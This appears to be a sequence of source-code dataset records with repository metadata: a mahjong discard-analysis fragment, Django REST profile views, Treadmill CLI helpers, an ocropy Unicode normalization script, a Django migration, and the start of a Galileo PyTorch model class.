yourRateP = choices[allchoice.index(Tile.valueToTile(Tile.tileToValue(item.tile)))][1]
bestRate = 1 - (1 - bestRateP / invisibleTiles) * (1 - bestRateP / (invisibleTiles - 1))
yourRate = 1 - (1 - yourRateP / invisibleTiles) * (1 - yourRateP / (invisibleTiles - 1))
wrong_rate = 1 - yourRate / bestRate
melds = []
for i in self.melds:
melds.extend(i)
ht = ''
for i in self.handtile:
ht = ht + Tile.tileToUtf(i)
tround = round(self.isrichi, wrong_rate, melds, ht,
Tile.tileToUtf(item.tile), [Tile.tileToUtf(i) for i in allchoice],
[Tile.tileToUtf(i) for i in goodchoice],
choices[allchoice.index(Tile.valueToTile(Tile.tileToValue(item.tile)))][2],
choices[0][2], len(self.game.round) + 1, bestRateP, yourRateP, cc)
self.game.round.append(tround)
print(
'Your choice:{0},{1} Best choices:{2},{3}'.format(item.tile, choices[
allchoice.index(Tile.valueToTile(Tile.tileToValue(item.tile)))][1],
choices[0][0], choices[0][1]))
else:
invisibleTiles = 0
for i in range(38):
if i in [0, 10, 20, 30]:
continue
if self.playernum == 3:
if i in [2, 3, 4, 5, 6, 7, 8]:
continue
invisibleTiles += 4 - self.visibleTile[i]
bestRateP = choices[0][1]
melds = []
for i in self.melds:
melds.extend(i)
ht = ''
for i in self.handtile:
ht = ht + Tile.tileToUtf(i)
tround = round(self.isrichi, 1, melds, ht,
Tile.tileToUtf(item.tile), [Tile.tileToUtf(i) for i in allchoice],
[Tile.tileToUtf(i) for i in goodchoice], choices[0][2] + 1, choices[0][2],
len(self.game.round) + 1,
bestRateP, -1, cc)
self.game.round.append(tround)
                print('discarded tile not among computed choices')
print(item.tile, self.handtile)
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
return
self.visibleTile[Tile.tileToValue(item.tile)] += 1
def discard(self, item: Item):
if item.playername != self.playername:
return
        self.handtile.append(Tile.valueToTile(Tile.tileToValue(item.tile)))
        self.handtile.sort(key=Tile.tileToValue)
self.visibleTile[Tile.tileToValue(item.tile)] += 1
def babei(self, item: Item):
if item.playername == self.playername:
self.handtile.remove('4z')
            self.melds.append((Tile.tileToUtf('4z'),))
return
self.visibleTile[34] += 1
def chi(self, item: Item):
if item.playername == self.playername:
if item.eatstatus == 1:
self.handtile.remove(Tile.nextTile(item.tile))
self.handtile.remove(Tile.nextTile(Tile.nextTile(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(Tile.nextTile(item.tile)),
Tile.tileToUtf(Tile.nextTile(Tile.nextTile(item.tile)))))
if item.eatstatus == 2:
self.handtile.remove(Tile.nextTile(item.tile))
self.handtile.remove(Tile.prevTile(item.tile))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(Tile.nextTile(item.tile)),
Tile.tileToUtf(Tile.prevTile(item.tile))))
if item.eatstatus == 3:
self.handtile.remove(Tile.prevTile(item.tile))
self.handtile.remove(Tile.prevTile(Tile.prevTile(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(Tile.prevTile(item.tile)),
Tile.tileToUtf(Tile.prevTile(Tile.prevTile(item.tile)))))
return
else:
if item.eatstatus == 1:
self.visibleTile[Tile.tileToValue(Tile.nextTile(item.tile))] += 1
self.visibleTile[Tile.tileToValue(Tile.nextTile(Tile.nextTile(item.tile)))] += 1
if item.eatstatus == 2:
self.visibleTile[Tile.tileToValue(Tile.nextTile(item.tile))] += 1
self.visibleTile[Tile.tileToValue(Tile.prevTile(item.tile))] += 1
if item.eatstatus == 3:
self.visibleTile[Tile.tileToValue(Tile.prevTile(item.tile))] += 1
self.visibleTile[Tile.tileToValue(Tile.prevTile(Tile.prevTile(item.tile)))] += 1
def peng(self, item: Item):
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile)))
return
self.visibleTile[Tile.tileToValue(item.tile)] += 2
def gang(self, item: Item):
self.doraNum += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-7 - 2 * self.doraNum])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-3 - 2 * self.doraNum])] += 1
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile),
Tile.tileToUtf(item.tile)))
return
self.visibleTile[Tile.tileToValue(item.tile)] += 3
def addGang(self, item: Item):
self.doraNum += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-7 - 2 * self.doraNum])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-3 - 2 * self.doraNum])] += 1
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.remove((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile),
Tile.tileToUtf(item.tile)))
return
else:
self.visibleTile[Tile.tileToValue(item.tile)] += 3
def anGang(self, item: Item):
self.doraNum += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-7 - 2 * self.doraNum])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-3 - 2 * self.doraNum])] += 1
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.append(
(Tile.tileToUtf('8z'), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf('8z')))
return
else:
self.visibleTile[Tile.tileToValue(item.tile)] += 4
def calculateBest(self):
a = reasoner()
choices, xh = a.discardTileList([Tile.tileToValue(i) for i in self.handtile], self.playernum)
bestChoices = []
for i in choices.keys():
tmp = 0
for j in choices[i][0]:
tmp += 4 - self.visibleTile[j]
bestChoices.append((i, tmp, choices[i][1], choices[i][0]))
bestChoices.sort(key=lambda x: x[1], reverse=True)
return xh, bestChoices
def simulateRound(self, roundData: Round):
self.initround(roundData)
print('new round!!!')
for i in roundData.itemList:
if i.op.value == 1:
self.deal(i)
if i.op.value == 2:
self.discard(i)
if i.op.value == 10:
self.babei(i)
if i.op.value == -1:
self.chi(i)
if i.op.value == -2:
self.peng(i)
if i.op.value == -3:
self.gang(i)
if i.op.value == -4:
self.addGang(i)
if i.op.value == -5:
self.anGang(i)
if i.op.value == 0 or i.op.value == -10:
self.report[0].game.append(self.game)
| true
| true
|
1c4900235bf1e0eb9fa5f69a5c4b5d09ce43d13e
| 4,554
|
py
|
Python
|
newprofiles_api/views.py
|
rayhaan12/newprofiles-rest-api
|
4bff98a815f8773e0c1a90be354d5df5b2987034
|
[
"MIT"
] | null | null | null |
newprofiles_api/views.py
|
rayhaan12/newprofiles-rest-api
|
4bff98a815f8773e0c1a90be354d5df5b2987034
|
[
"MIT"
] | null | null | null |
newprofiles_api/views.py
|
rayhaan12/newprofiles-rest-api
|
4bff98a815f8773e0c1a90be354d5df5b2987034
|
[
"MIT"
] | null | null | null |
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets
from rest_framework.authentication import TokenAuthentication
from rest_framework import filters
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
# from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework.permissions import IsAuthenticated
from newprofiles_api import serializers
from newprofiles_api import models
from newprofiles_api import permissions
class HelloApiView(APIView):
"""Test API View"""
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
"""Returns a list of APIView features"""
an_apiview = [
'Uses HTTP methods as function (get, post, patch, put, delete)',
'Is similar to a traditional Django view',
'Gives you the most control over your application logic',
'Is mapped manually to URLs'
]
return Response({'message': 'Hello', 'an_apiview': an_apiview})
def post(self, request):
"""Create a hello message with our name"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def put(self, request, pk=None):
"""Handle updating an object"""
return Response({'method': 'PUT'})
def patch(self, request, pk=None):
"""Handle a partial update of an object"""
return Response({'method': 'PATCH'})
def delete(self, request, pk=None):
"""Delete an object"""
return Response({'method': 'DELETE'})
class HelloViewSet(viewsets.ViewSet):
"""Test API ViewSet"""
serializer_class = serializers.HelloSerializer
def list(self, request):
"""Return a hello message"""
a_viewset = [
'Uses actions (list, create, retrieve, update, partial_update)',
'Automatically maps to URLs using Routers',
'Provides more functionality with less code',
]
return Response({'message': 'Hello!', 'a_viewset': a_viewset})
def create(self, request):
"""Create a new hello message"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}!'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def retrieve(self, request, pk=None):
"""Handle getting an object by its ID"""
return Response({'http_method': 'GET'})
def update(self, request, pk=None):
"""Handle updating an object"""
return Response({'http_method': 'PUT'})
def partial_update(self, request, pk=None):
"""Handle updating part of an object"""
        return Response({'http_method': 'PATCH'})
def destroy(self, request, pk=None):
"""Handle removing an object"""
return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet):
"""Handle creating and updating profiles"""
serializer_class = serializers.UserProfileSerializer
queryset = models.UserProfile.objects.all()
authentication_classes = (TokenAuthentication, )
permission_classes = (permissions.UpdateOwnProfile, )
filter_backends = (filters.SearchFilter, )
search_fields = ('name', 'email', )
class UserLoginApiView(ObtainAuthToken):
"""Handle creating user authentication tokens"""
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class UserProfileFeedViewSet(viewsets.ModelViewSet):
"""Handles creating, reading, and updating profile feed items"""
authentication_classes = (TokenAuthentication, )
serializer_class = serializers.ProfileFeedItemSerializer
queryset = models.ProfileFeedItem.objects.all()
permission_classes = (permissions.UpdateOwnStatus, IsAuthenticated)
def perform_create(self, serializer):
"""Sets the user profile to the logged in user"""
serializer.save(user_profile=self.request.user)
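

# A hypothetical urls.py wiring for these viewsets (not part of this module;
# names are illustrative):
#
#   from rest_framework.routers import DefaultRouter
#   from newprofiles_api import views
#
#   router = DefaultRouter()
#   router.register('profile', views.UserProfileViewSet)
#   router.register('feed', views.UserProfileFeedViewSet)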
| 35.030769
| 76
| 0.66996
|
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets
from rest_framework.authentication import TokenAuthentication
from rest_framework import filters
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from rest_framework.permissions import IsAuthenticated
from newprofiles_api import serializers
from newprofiles_api import models
from newprofiles_api import permissions
class HelloApiView(APIView):
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
an_apiview = [
'Uses HTTP methods as function (get, post, patch, put, delete)',
'Is similar to a traditional Django view',
'Gives you the most control over your application logic',
'Is mapped manually to URLs'
]
return Response({'message': 'Hello', 'an_apiview': an_apiview})
def post(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def put(self, request, pk=None):
return Response({'method': 'PUT'})
def patch(self, request, pk=None):
return Response({'method': 'PATCH'})
def delete(self, request, pk=None):
return Response({'method': 'DELETE'})
class HelloViewSet(viewsets.ViewSet):
serializer_class = serializers.HelloSerializer
def list(self, request):
a_viewset = [
'Uses actions (list, create, retrieve, update, partial_update)',
'Automatically maps to URLs using Routers',
'Provides more functionality with less code',
]
return Response({'message': 'Hello!', 'a_viewset': a_viewset})
def create(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}!'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def retrieve(self, request, pk=None):
return Response({'http_method': 'GET'})
def update(self, request, pk=None):
return Response({'http_method': 'PUT'})
def partial_update(self, request, pk=None):
        return Response({'http_method': 'PATCH'})
def destroy(self, request, pk=None):
return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet):
serializer_class = serializers.UserProfileSerializer
queryset = models.UserProfile.objects.all()
authentication_classes = (TokenAuthentication, )
permission_classes = (permissions.UpdateOwnProfile, )
filter_backends = (filters.SearchFilter, )
search_fields = ('name', 'email', )
class UserLoginApiView(ObtainAuthToken):
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class UserProfileFeedViewSet(viewsets.ModelViewSet):
authentication_classes = (TokenAuthentication, )
serializer_class = serializers.ProfileFeedItemSerializer
queryset = models.ProfileFeedItem.objects.all()
permission_classes = (permissions.UpdateOwnStatus, IsAuthenticated)
def perform_create(self, serializer):
serializer.save(user_profile=self.request.user)
| true
| true
|
1c490055f5f4562ff857ac82287c7b72e90656c7
| 11,830
|
py
|
Python
|
lib/python/treadmill/cli/__init__.py
|
vrautela/treadmill
|
05e47fa8acdf8bad7af78e737efb26ea6488de82
|
[
"Apache-2.0"
] | null | null | null |
lib/python/treadmill/cli/__init__.py
|
vrautela/treadmill
|
05e47fa8acdf8bad7af78e737efb26ea6488de82
|
[
"Apache-2.0"
] | 1
|
2017-09-18T10:36:12.000Z
|
2017-09-18T10:36:12.000Z
|
lib/python/treadmill/cli/__init__.py
|
evreng/treadmill
|
05e47fa8acdf8bad7af78e737efb26ea6488de82
|
[
"Apache-2.0"
] | null | null | null |
"""Treadmill commaand line helpers.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# Disable too many lines in module warning.
#
# pylint: disable=C0302
import codecs
import copy
import functools
import io
import logging
import os
import pkgutil
import re
import sys
import traceback
import click
import six
from six.moves import configparser
import treadmill
from treadmill import restclientopts
from treadmill import plugin_manager
from treadmill import context
from treadmill import utils
from treadmill import subproc
EXIT_CODE_DEFAULT = 1
# Disable unicode_literals click warning.
click.disable_unicode_literals_warning = True
def init_logger(name):
"""Initialize logger.
"""
try:
# logging configuration files in json format
conf = treadmill.logging.load_logging_conf(name)
logging.config.dictConfig(conf)
except configparser.Error:
# TODO: Incidentally, tempfile adds 2M memory, and it is used only
# in case of exception. Need to move this elsewhere.
import tempfile
with tempfile.NamedTemporaryFile(delete=False, mode='w') as f:
traceback.print_exc(file=f)
click.echo('Error parsing log conf: {name}'.format(name=name),
err=True)
def init_profile():
"""Initailize profile.
"""
if 'TREADMILL_ALIASES_PATH' in os.environ:
subproc.load_aliases(os.environ['TREADMILL_ALIASES_PATH'])
else:
packages = ['aliases']
profile = context.GLOBAL.get_profile_name()
if profile:
packages.append('aliases.{}'.format(profile))
subproc.load_packages(packages)
def make_commands(section, **click_args):
"""Make a Click multicommand from all submodules of the module."""
class MCommand(click.MultiCommand):
"""Treadmill CLI driver."""
def __init__(self, *args, **kwargs):
if kwargs and click_args:
kwargs.update(click_args)
click.MultiCommand.__init__(self, *args, **kwargs)
def list_commands(self, ctx):
"""Return list of commands in section."""
return sorted(plugin_manager.names(section))
def get_command(self, ctx, cmd_name):
"""Return dymanically constructed command."""
try:
return plugin_manager.load(section, cmd_name).init()
except ImportError as import_err:
print(
'dependency error: {}:{} - {}'.format(
section, cmd_name, str(import_err)
),
file=sys.stderr
)
except KeyError:
raise click.UsageError('Invalid command: %s' % cmd_name)
return MCommand
def _read_password(value):
"""Heuristic to either read the password from file or return the value."""
if os.path.exists(value):
with io.open(value) as f:
return f.read().strip()
else:
return value
def handle_context_opt(ctx, param, value):
"""Handle eager CLI options to configure context.
The eager options are evaluated directly during parsing phase, and can
affect other options parsing (like required/not).
The only side effect of consuming these options are setting attributes
of the global context.
"""
# pylint: disable=too-many-branches
def parse_dns_server(dns_server):
"""Parse dns server string"""
if ':' in dns_server:
hosts_port = dns_server.split(':')
return (hosts_port[0].split(','), int(hosts_port[1]))
else:
return (dns_server.split(','), None)
if not value or ctx.resilient_parsing:
return None
if value == '-':
return None
opt = param.name
if opt == 'cell':
cell_parts = value.split('.')
context.GLOBAL.cell = cell_parts.pop(0)
if cell_parts:
context.GLOBAL.dns_domain = '.'.join(cell_parts)
elif opt == 'dns_domain':
context.GLOBAL.dns_domain = value
elif opt == 'dns_server':
context.GLOBAL.dns_server = parse_dns_server(value)
elif opt == 'ldap':
context.GLOBAL.ldap.url = value
elif opt == 'ldap_master':
context.GLOBAL.ldap.write_url = value
elif opt == 'ldap_suffix':
context.GLOBAL.ldap_suffix = value
elif opt == 'ldap_user':
context.GLOBAL.ldap.user = value
elif opt == 'ldap_pwd':
context.GLOBAL.ldap.password = _read_password(value)
elif opt == 'zookeeper':
context.GLOBAL.zk.url = value
elif opt == 'profile':
context.GLOBAL.set_profile_name(value)
init_profile()
elif opt == 'api_service_principal':
restclientopts.AUTH_PRINCIPAL = value
else:
raise click.UsageError('Invalid option: %s' % param.name)
return value
class _CommaSepList(click.ParamType):
"""Custom input type for comma separated values."""
name = 'list'
def convert(self, value, param, ctx):
"""Convert command line argument to list."""
if value is None:
return []
try:
return value.split(',')
except AttributeError:
self.fail('%s is not a comma separated list' % value, param, ctx)
LIST = _CommaSepList()
class Enums(click.ParamType):
"""Custom input type for comma separated enums."""
name = 'enumlist'
def __init__(self, choices):
self.choices = choices
def get_metavar(self, param):
return '[%s]' % '|'.join(self.choices)
def get_missing_message(self, param):
return 'Choose from %s.' % ', '.join(self.choices)
def convert(self, value, param, ctx):
"""Convert command line argument to list."""
if value is None:
return []
choices = []
try:
for val in value.split(','):
if val in self.choices:
choices.append(val)
else:
self.fail(
'invalid choice: %s. (choose from %s)' %
(val, ', '.join(self.choices)),
param, ctx
)
return choices
except AttributeError:
self.fail('%s is not a comma separated list' % value, param, ctx)
class _KeyValuePairs(click.ParamType):
"""Custom input type for key/value pairs."""
name = 'key/value pairs'
def convert(self, value, param, ctx):
"""Convert command line argument to list."""
if value is None:
return {}
items = re.split(r'([\w\.\-]+=)', value)
items.pop(0)
keys = [key.rstrip('=') for key in items[0::2]]
values = [value.rstrip(',') for value in items[1::2]]
return dict(zip(keys, values))
DICT = _KeyValuePairs()
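# For example (illustrative):
#   DICT.convert('mem=1G,cpu=10%', None, None) == {'mem': '1G', 'cpu': '10%'}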
def validate_memory(_ctx, _param, value):
"""Validate memory string."""
if value is None:
return None
if not re.search(r'\d+[KkMmGg]$', value):
raise click.BadParameter('Memory format: nnn[K|M|G].')
return value
def validate_disk(_ctx, _param, value):
"""Validate disk string."""
if value is None:
return None
if not re.search(r'\d+[KkMmGg]$', value):
raise click.BadParameter('Disk format: nnn[K|M|G].')
return value
def validate_cpu(_ctx, _param, value):
"""Validate cpu string."""
if value is None:
return None
if not re.search(r'\d+%$', value):
raise click.BadParameter('CPU format: nnn%.')
return value
def validate_cpuset_cores(_ctx, _param, value):
"""Validate cpuset cores string."""
if value is None:
return None
if not re.search(r'\d+\-?\d*(,\d+\-?\d*)*$', value):
raise click.BadParameter('CPU cores format: nnn[,nnn-[nnn]].')
return value
def validate_reboot_schedule(_ctx, _param, value):
"""Validate reboot schedule specification."""
if value is None:
return None
try:
utils.reboot_schedule(value)
except ValueError:
raise click.BadParameter('Invalid reboot schedule. (eg.: "sat,sun")')
return value
def combine(list_of_values, sep=','):
"""Split and sum list of sep string into one list.
"""
combined = sum(
[str(values).split(sep) for values in list(list_of_values)],
[]
)
if combined == ['-']:
combined = None
return combined
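# e.g. combine(['a,b', 'c']) -> ['a', 'b', 'c'], while combine(['-']) -> None.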
def out(string, *args):
"""Print to stdout."""
if args:
string = string % args
click.echo(string)
def handle_exceptions(exclist):
"""Decorator that will handle exceptions and output friendly messages."""
def wrap(f):
"""Returns decorator that wraps/handles exceptions."""
exclist_copy = copy.copy(exclist)
@functools.wraps(f)
def wrapped_f(*args, **kwargs):
"""Wrapped function."""
if not exclist_copy:
f(*args, **kwargs)
else:
exc, handler = exclist_copy.pop(0)
try:
wrapped_f(*args, **kwargs)
except exc as err:
if isinstance(handler, six.string_types):
click.echo(handler, err=True)
elif handler is None:
click.echo(str(err), err=True)
else:
click.echo(handler(err), err=True)
sys.exit(EXIT_CODE_DEFAULT)
@functools.wraps(f)
def _handle_any(*args, **kwargs):
"""Default exception handler."""
try:
return wrapped_f(*args, **kwargs)
except click.UsageError as usage_err:
click.echo('Usage error: %s' % str(usage_err), err=True)
sys.exit(EXIT_CODE_DEFAULT)
except Exception as unhandled: # pylint: disable=W0703
# TODO: see similar comment as to why lazy import tempfile.
import tempfile
with tempfile.NamedTemporaryFile(delete=False, mode='w') as f:
traceback.print_exc(file=f)
click.echo('Error: %s [ %s ]' % (unhandled, f.name),
err=True)
sys.exit(EXIT_CODE_DEFAULT)
return _handle_any
return wrap
OUTPUT_FORMAT = None
def make_formatter(pretty_formatter):
"""Makes a formatter."""
def _format(item, how=None):
"""Formats the object given global format setting."""
if OUTPUT_FORMAT is None:
how = pretty_formatter
else:
how = OUTPUT_FORMAT
try:
fmt = plugin_manager.load('treadmill.formatters', how)
return fmt.format(item)
except KeyError:
return str(item)
return _format
def bad_exit(string, *args):
"""System exit non-zero with a string to sys.stderr.
The printing takes care of the newline"""
if args:
string = string % args
click.echo(string, err=True)
sys.exit(-1)
def echo_colour(colour, string, *args):
"""click.echo colour with support for placeholders, e.g. %s"""
if args:
string = string % args
click.echo(click.style(string, fg=colour))
def echo_green(string, *args):
"""click.echo green with support for placeholders, e.g. %s"""
echo_colour('green', string, *args)
def echo_yellow(string, *args):
"""click.echo yellow with support for placeholders, e.g. %s"""
echo_colour('yellow', string, *args)
def echo_red(string, *args):
"""click.echo yellow with support for placeholders, e.g. %s"""
echo_colour('red', string, *args)
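# --- Usage sketch (not part of the original module) ---
# A minimal, self-contained illustration of the handle_exceptions pattern
# above: the first (exception, handler) pair in the list becomes the
# outermost handler. Note that the closure list is consumed on the first
# invocation, which is fine for a CLI command that runs once per process.
# MY_EXCLIST and fetch_resource are hypothetical names.
import copy
import functools
import sys

MY_EXCLIST = [
    (KeyError, 'resource not found'),                  # plain message
    (ValueError, lambda err: 'bad value: %s' % err),   # callable handler
]


def _handle_exceptions_sketch(exclist):
    """Same shape as handle_exceptions above, minus click and tempfile."""
    def wrap(f):
        exclist_copy = copy.copy(exclist)

        @functools.wraps(f)
        def wrapped_f(*args, **kwargs):
            if not exclist_copy:
                return f(*args, **kwargs)
            exc, handler = exclist_copy.pop(0)
            try:
                return wrapped_f(*args, **kwargs)
            except exc as err:
                msg = handler(err) if callable(handler) else handler
                print(msg, file=sys.stderr)
                sys.exit(1)
        return wrapped_f
    return wrap


@_handle_exceptions_sketch(MY_EXCLIST)
def fetch_resource(name):
    raise KeyError(name)   # when called: prints 'resource not found', exits 1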
| 27.704918
| 78
| 0.594928
|
1c49017bb9ee1597a023b8f28ea2fa9d21d3b4ee
| 1,468
|
py
|
Python
|
ocropy/normalize.py
|
GuillaumeDesforges/ocr-enpc
|
2d92561ce8f239bcbc90dd666e3e5711e311da01
|
[
"MIT"
] | 1
|
2018-05-03T13:40:42.000Z
|
2018-05-03T13:40:42.000Z
|
ocropy/normalize.py
|
GuillaumeDesforges/ocr-enpc
|
2d92561ce8f239bcbc90dd666e3e5711e311da01
|
[
"MIT"
] | null | null | null |
ocropy/normalize.py
|
GuillaumeDesforges/ocr-enpc
|
2d92561ce8f239bcbc90dd666e3e5711e311da01
|
[
"MIT"
] | null | null | null |
# coding: unicode
import os
import codecs
import unicodedata
print("Script deprecated : path was hard set in the script, change it or do not use this script")
path = "C:\\Users\\teovi\\Documents\\ocropy\\book"
os.chdir(path)
compteur=0
strchar=""
for folder in os.listdir(path):
for file in os.listdir(path+"\\"+folder):
if "gt" in file:
# print(folder+"\\"+file)
f = codecs.open(folder+"\\"+file, 'r', encoding='utf-8')
for line in f:
newline = ""
for char in line:
if char not in strchar:
strchar+=char
if char == "ſ":
newline+="Z"
else:
newline+=char
newline=unicodedata.normalize('NFKC',newline)
f.close()
# f = codecs.open(folder+"\\"+file, 'w', encoding='utf-8')
# f.write(newline)
# f.close()
strchar = ''.join(sorted(strchar))
print(strchar)
# '-./9ABCDFGJKLMNOPQRSTabcefghklmnopqrstuvwxyzãõ÷ıũɑ́̃͛ͣͤͥͦδ᷑ẽꝑꝓꝛꝯ]
# '-./9ABCDFGJKLMNOPQRSTabcefghklmnopqrstuvwxyzãõ÷ıũɑ́̃͛ͣͤͥͦδ᷑ẽ⁹ꝑꝓꝛꝯ\ue476\uf217"
normstrchar1 = unicodedata.normalize('NFKC', strchar)
normstrchar1 = ''.join(sorted(normstrchar1))
print(normstrchar1)
normstrchar2 = unicodedata.normalize('NFC', strchar)
normstrchar2 = ''.join(sorted(normstrchar2))
print(normstrchar2)
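# --- Illustration (not part of the original script) ---
# Why the script compares NFKC against NFC: NFC only composes canonical
# equivalents, while NFKC additionally folds compatibility characters such
# as the superscript nine that appears in the character inventory above.
# (unicodedata is imported at the top of this script.)
demo = "e\u0301 \u2079"                      # 'e' + combining acute, then '⁹'
print(unicodedata.normalize('NFC', demo))    # 'é ⁹' (composed; '⁹' unchanged)
print(unicodedata.normalize('NFKC', demo))   # 'é 9' ('⁹' folded to ASCII '9')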
| 28.230769
| 97
| 0.557221
|
1c490274108d5768a6bcbaabd2f373b211f3f15d
| 101
|
py
|
Python
|
venv/Lib/site-packages/xero_python/assets/api/__init__.py
|
RobMilinski/Xero-Starter-Branched-Test
|
c82382e674b34c2336ee164f5a079d6becd1ed46
|
[
"MIT"
] | 77
|
2020-02-16T03:50:18.000Z
|
2022-03-11T03:53:26.000Z
|
venv/Lib/site-packages/xero_python/assets/api/__init__.py
|
RobMilinski/Xero-Starter-Branched-Test
|
c82382e674b34c2336ee164f5a079d6becd1ed46
|
[
"MIT"
] | 50
|
2020-04-06T10:15:52.000Z
|
2022-03-29T21:27:50.000Z
|
venv/Lib/site-packages/xero_python/assets/api/__init__.py
|
RobMilinski/Xero-Starter-Branched-Test
|
c82382e674b34c2336ee164f5a079d6becd1ed46
|
[
"MIT"
] | 27
|
2020-06-04T11:16:17.000Z
|
2022-03-19T06:27:36.000Z
|
# flake8: noqa
# import apis into api package
from xero_python.assets.api.asset_api import AssetApi
| 20.2
| 53
| 0.80198
|
1c49033f05e9e0790baf8ce9b9950502c82c3278
| 606
|
py
|
Python
|
opconsole/migrations/0023_auto_20170502_2024.py
|
baalkor/timetracking
|
35a1650ceffa55e0ff7ef73b63e5f3457dc07612
|
[
"Apache-2.0"
] | 1
|
2017-06-05T10:52:13.000Z
|
2017-06-05T10:52:13.000Z
|
opconsole/migrations/0023_auto_20170502_2024.py
|
baalkor/timetracking
|
35a1650ceffa55e0ff7ef73b63e5f3457dc07612
|
[
"Apache-2.0"
] | 2
|
2017-05-10T20:47:33.000Z
|
2017-05-10T20:49:24.000Z
|
opconsole/migrations/0023_auto_20170502_2024.py
|
baalkor/timetracking
|
35a1650ceffa55e0ff7ef73b63e5f3457dc07612
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-05-03 02:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('opconsole', '0022_auto_20170502_0758'),
]
operations = [
migrations.AddField(
model_name='employes',
name='enable',
field=models.BooleanField(default=True),
),
migrations.AlterField(
model_name='device',
name='salt',
field=models.CharField(max_length=14),
),
]
| 23.307692
| 52
| 0.590759
|
1c49037ff6e473a89af4860bbc9a341ab81fa67b
| 2,881
|
py
|
Python
|
galileo/framework/pytorch/python/unsupervised.py
|
YaoPu2021/galileo
|
0ebee2052bf78205f93f8cbbe0e2884095dd7af7
|
[
"Apache-2.0"
] | 115
|
2021-09-09T03:01:58.000Z
|
2022-03-30T10:46:26.000Z
|
galileo/framework/pytorch/python/unsupervised.py
|
Hacky-DH/galileo
|
e4d5021f0287dc879730dfa287b9a056f152f712
|
[
"Apache-2.0"
] | 1
|
2021-12-09T07:34:41.000Z
|
2021-12-20T06:24:27.000Z
|
galileo/framework/pytorch/python/unsupervised.py
|
Hacky-DH/galileo
|
e4d5021f0287dc879730dfa287b9a056f152f712
|
[
"Apache-2.0"
] | 28
|
2021-09-10T08:47:20.000Z
|
2022-03-17T07:29:26.000Z
|
# Copyright 2020 JD.com, Inc. Galileo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from collections import OrderedDict
import torch
from torch.nn import Module
from galileo.framework.python.base_unsupervised import BaseUnsupervised
from galileo.platform.export import export
from galileo.framework.pytorch.python.metrics import get_metric
from galileo.framework.pytorch.python.losses import get_loss
@export('galileo.pytorch')
class Unsupervised(Module, BaseUnsupervised):
r'''
\brief unsupervised network embedding model
compute the loss and metrics
Methods that the subclass must implement:\n
target_encoder,
context_encoder,
'''
def __init__(self,
